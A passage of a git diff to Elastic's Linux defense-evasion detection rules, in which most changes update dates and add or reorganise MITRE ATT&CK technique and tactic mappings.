b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,7 +127,25 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.004" +name = "Disable or Modify System Firewall" +reference = "https://attack.mitre.org/techniques/T1562/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml index 716db12a621..b3ff2f7b3f7 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -141,3 +141,16 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml index b1c2b0ae4e9..a7383503df1 100644 --- a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml +++ b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,3 +118,16 @@ reference = "https://attack.mitre.org/techniques/T1070/004/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml index 5b514d442b2..11e14f7ebb2 100644 --- a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml +++ b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/17" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,3 +142,21 @@ reference = "https://attack.mitre.org/techniques/T1140/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1132" +name = "Data Encoding" +reference = "https://attack.mitre.org/techniques/T1132/" + +[[rule.threat.technique.subtechnique]] +id = "T1132.001" +name = "Standard Encoding" +reference = "https://attack.mitre.org/techniques/T1132/001/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/defense_evasion_base64_decoding_activity.toml b/rules/linux/defense_evasion_base64_decoding_activity.toml index 375a8b62e4e..d0fee31c966 100644 --- a/rules/linux/defense_evasion_base64_decoding_activity.toml +++ b/rules/linux/defense_evasion_base64_decoding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -201,6 +201,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" diff --git a/rules/linux/defense_evasion_bpf_program_tampering.toml b/rules/linux/defense_evasion_bpf_program_tampering.toml index f23dcdf2669..9c269d4eed0 100644 --- a/rules/linux/defense_evasion_bpf_program_tampering.toml +++ b/rules/linux/defense_evasion_bpf_program_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,6 +89,11 @@ process.name == "bpftool" and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" @@ -99,11 +104,6 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml index 05fae4d0549..2f28952308b 100644 --- a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml +++ b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/20" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -144,46 +144,56 @@ sequence with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" - [[rule.threat.technique]] - id = "T1218" - name = "System Binary Proxy Execution" - reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - id = "TA0011" - name = "Command and Control" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - id = "TA0010" - name = "Exfiltration" - reference = "https://attack.mitre.org/tactics/TA0010/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/defense_evasion_directory_creation_in_bin.toml b/rules/linux/defense_evasion_directory_creation_in_bin.toml index 450965c1864..e1b62a2cde4 100644 --- a/rules/linux/defense_evasion_directory_creation_in_bin.toml +++ b/rules/linux/defense_evasion_directory_creation_in_bin.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,6 +108,16 @@ not process.parent.executable in ("/usr/bin/make", "/bin/make") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" diff --git a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml index 8f0a8af6a0e..c0e2fdee593 100644 --- a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml +++ b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -112,3 +112,21 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/defense_evasion_dynamic_linker_file_creation.toml b/rules/linux/defense_evasion_dynamic_linker_file_creation.toml index 92d844476c3..7a626cecbc5 100644 --- a/rules/linux/defense_evasion_dynamic_linker_file_creation.toml +++ b/rules/linux/defense_evasion_dynamic_linker_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -160,3 +160,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/defense_evasion_file_deletion_via_shred.toml b/rules/linux/defense_evasion_file_deletion_via_shred.toml index 90b9c8b3890..d879a0396bd 100644 --- a/rules/linux/defense_evasion_file_deletion_via_shred.toml +++ b/rules/linux/defense_evasion_file_deletion_via_shred.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,3 +127,15 @@ id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml index b838709d6db..7eed59e94d8 100644 --- a/rules/linux/defense_evasion_file_mod_writable_dir.toml +++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,11 +131,15 @@ id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable", "process.command_line"] diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml index 96000cee0bf..d2550c0373f 100644 --- a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml +++ b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,11 @@ id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml index 62bddb86804..8d95fcc7b4d 100644 --- a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml +++ b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -156,6 +156,16 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml index 46ad1a21591..a2affed2d17 100644 --- a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml +++ b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,10 +124,15 @@ In Linux environments, system users are typically non-interactive and serve spec [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" [[rule.threat.technique]] id = "T1564" @@ -139,6 +144,28 @@ id = "T1564.002" name = "Hidden Users" reference = "https://attack.mitre.org/techniques/T1564/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml index 1ac5aa2f508..c1bb6e2a72d 100644 --- a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml +++ b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -126,45 +126,55 @@ sequence by host.id, process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] - name = "Obfuscated Files or Information" - id = "T1027" - reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" - [[rule.threat.technique]] - name = "Deobfuscate/Decode Files or Information" - id = "T1140" - reference = "https://attack.mitre.org/techniques/T1140/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_kill_command_executed.toml b/rules/linux/defense_evasion_kill_command_executed.toml index 68a5e17a6e7..225fabde9e2 100644 --- a/rules/linux/defense_evasion_kill_command_executed.toml +++ b/rules/linux/defense_evasion_kill_command_executed.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,10 +103,20 @@ process.name:(kill or pkill or killall) and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" [[rule.threat.technique]] id = "T1564" @@ -118,24 +128,14 @@ id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" -[[rule.threat.technique]] -name = "Impair Defenses" -id = "T1562" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -name = "Indicator Blocking" -id = "T1562.006" -reference = "https://attack.mitre.org/techniques/T1562/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -146,6 +146,23 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/linux/defense_evasion_kthreadd_masquerading.toml b/rules/linux/defense_evasion_kthreadd_masquerading.toml index 847734d3990..e002b267bf6 100644 --- a/rules/linux/defense_evasion_kthreadd_masquerading.toml +++ b/rules/linux/defense_evasion_kthreadd_masquerading.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,11 @@ id = "T1036.004" name = "Masquerade Task or Service" reference = "https://attack.mitre.org/techniques/T1036/004/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" diff --git a/rules/linux/defense_evasion_ld_preload_cmdline.toml b/rules/linux/defense_evasion_ld_preload_cmdline.toml index 3ac9270442c..46324c56b74 100644 --- a/rules/linux/defense_evasion_ld_preload_cmdline.toml +++ b/rules/linux/defense_evasion_ld_preload_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,57 +111,74 @@ process.args:-c and process.command_line:(*LD_LIBRARY_PATH=* or *LD_PRELOAD=*) [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Privilege Escalation" - id = "TA0004" - reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name", "process.command_line", "host.id"] diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml index 8559b7e0144..125a2f0289d 100644 --- a/rules/linux/defense_evasion_ld_so_creation.toml +++ b/rules/linux/defense_evasion_ld_so_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,16 @@ id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_log_files_deleted.toml b/rules/linux/defense_evasion_log_files_deleted.toml index f0e1caa086b..227b89f7c69 100644 --- a/rules/linux/defense_evasion_log_files_deleted.toml +++ b/rules/linux/defense_evasion_log_files_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,6 +133,11 @@ id = "T1070.002" name = "Clear Linux or Mac System Logs" reference = "https://attack.mitre.org/techniques/T1070/002/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_mount_execution.toml b/rules/linux/defense_evasion_mount_execution.toml index debb67bae1a..f2f493c7d53 100644 --- a/rules/linux/defense_evasion_mount_execution.toml +++ b/rules/linux/defense_evasion_mount_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,11 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml index 14c9ecdfc1d..2a9ade9c742 100644 --- a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml +++ 